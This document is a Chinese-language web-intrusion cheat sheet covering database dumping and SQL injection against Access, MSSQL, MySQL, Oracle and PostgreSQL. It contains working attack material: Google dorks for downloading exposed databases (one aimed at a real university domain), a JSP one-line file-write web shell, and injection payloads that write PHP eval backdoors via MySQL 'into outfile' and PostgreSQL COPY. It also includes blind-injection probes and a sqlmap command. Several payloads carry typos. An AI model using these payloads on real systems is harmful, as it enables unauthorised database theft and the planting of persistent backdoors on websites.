网页自动跳转:
<meta http-equiv="refresh" content="5;url=http://baidu.com" />
暴库利用方法:
/inc/conn.asp 中有连接数据库的路径信息
to parent directory 去父路径
直接下载数据库,搜索:
intext:to parent directory+intext:mdb site:fudan.edu.cn
绕过数据库防下载:
#sdsf.mdb -> %23sdsf.mdb
高级暴库:
inurl: ./..admin../..add..
inurl: ./..admin../..del..
inurl: /.asp<id=<%<%<%
密码爆破工具:
hydra,PKAV HTTP Fuzzer
access注入
Access数据库
ASP中连接字符串应用:
”Driver={microsoft access driver(*.mdb)};dbq=*.mdb;uid=admin;pwd=pass;“
dim conn
set conn = server.createObject("adodb.connection")
conn.open "provider=Microsoft.ACE.OLEDB.12.0;"&"data source="&server.mapath("bbs.mdb")
破障Access数据库查看器
Mssql数据库
TCP 0.0.0.0:1433
数据库名称后缀:*.mdf 日志文件后缀:*.ldf
mssql数据库权限:
sa权限:数据库操作,文件管理,命令执行,注册表读取,system
db权限:文件管理,数据库操作,users-administrators
public权限:数据库操作,guest-users
调用代码:
<%
set conn = server.createObject("adodb.connection")
conn.open "provider=sqloledb;source=local;uid=sa;pwd=***;database=database-name"
%>
一句话jsp:
<% if(request.getParameter("f")!=null)
(new java.IO.FileOutPutStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
mysql数据库
相对access数据库来说,mysql更加多样化,存放数据更多。使用语言:php。
读函数:load_file()
load_file('d:/www/xx/index.php') -> 通过绝对路径来读取网页源文件,如果地址使用十六进制则不用加引号
例:and 1=2 union select 1,load_flie('C:\Inetpub\wwwroot\mysql-sql\inc\set_sql.php'),3,4,5,6,7,8,9,10
如果系统是windows server2003IIS可以读取c:/windows/system32/inetsrv/metabase.xml
写入函数:into outfile
and 1=2 union select 1,"<?php@eval($_POST['cracer']);?>",3,4,5,6,7,8,9,10 into outfile 'C:/Inetpub/wwwroot/mysql-sql/cracer.txt'
写一句话拿后门
oracle数据库
适合于大规模网站
and (select count(*) from admin) <>0 如果没有报错则说明存在这个表
and (selcet count(user) from admin) <>0 判断列名
and (select count(*) from admin where lengh(name)>=5)=1判断管理员账号长度
and (select count(*) from admin where ascii(substr(name,1,1))>=97)=1 判断第一个字符的ascii值范围
postgreaql数据库
and 1=cast(version() as int) 获取数据库版本信息
and 1=cast(user||123 as int) 获取当前用户名称 postgres用户相当于root用户权限
;create table xxx(w text not null); 创建表
;insert into xxx values($$<?php@eval($_POST[cracer]);?>$$); 向表中插入一句话木马
;copy x(w) to $$/home/kasugai_tochi/public_html/script/cracer.php$$; 将一句话木马保存为php文件
get/post注入
测试工具:
pangolin,sqlmap -u http://testasp.vulnweb.com/login.asp --data "tfUPass=1&tfUName=1"
http://test.com/page.asp?id=30 and 1=<%eval request("s")%> 当网站会记录输入信息时,可以尝试写入脚本
cookie注入
绕过防注入系统,cookie注入的形成有两个必须条件,条件1是:程序对get和post方式提交的数据进行了过滤,但未对cookie提交的数据库进行过滤。条件2是:需要程序在使用request对象获取数据的时候并未指明具体使用什么方法来获取,而是直接使用request("xx")的方式。